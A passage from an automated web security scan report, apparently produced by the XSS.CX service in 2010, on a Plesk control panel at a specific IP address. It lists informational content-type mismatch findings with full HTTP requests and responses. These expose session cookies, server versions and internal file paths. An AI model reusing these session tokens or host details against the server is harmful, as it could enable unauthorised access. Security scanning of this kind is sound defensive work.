X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:08:35 GMT
Connection: close
Content-Length: 77191

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...

11.5. http://174.122.23.218:8880/smb/app/top-categories-data/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /smb/app/top-categories-data/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /smb/app/top-categories-data/ HTTP/1.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us
x-prototype-version: 1.6.1_rc3
Referer: http://174.122.23.218:8880/smb/admin-home
x-requested-with: XMLHttpRequest
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: show-getting-started-popup=true; user=54a8ad2443247fe6e4900290dc4e0cf8; PHPSESSID=10321169792bce25daa15603ea9ba645

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:04:50 GMT
Connection: close
Content-Length: 1096

<ul class="aps-category-list">
<li class="web-content-management"><a href="/smb/app/available/id/apscatalog/?category=Web%2FContent+management">Content management</a></li><li class="web-blog"><a href
...[SNIP]...

11.6. http://174.122.23.218:8880/smb/file/upload/  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /smb/file/upload/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /smb/file/upload/?init=true HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/smb/file/index/type/private/folder/admin
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: show-getting-started-popup=false; do-not-show-getting-started-popup=true; show-getting-started-popup=true; user=187d997e8ea6a5d0f56792f7f9ba70a4; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 03:11:36 GMT
Connection: close
Content-Length: 45

{"status":"SUCCESS","message":"","data":null}

Report generated by XSS.CX at Sun Oct 10 00:24:14 CDT 2010.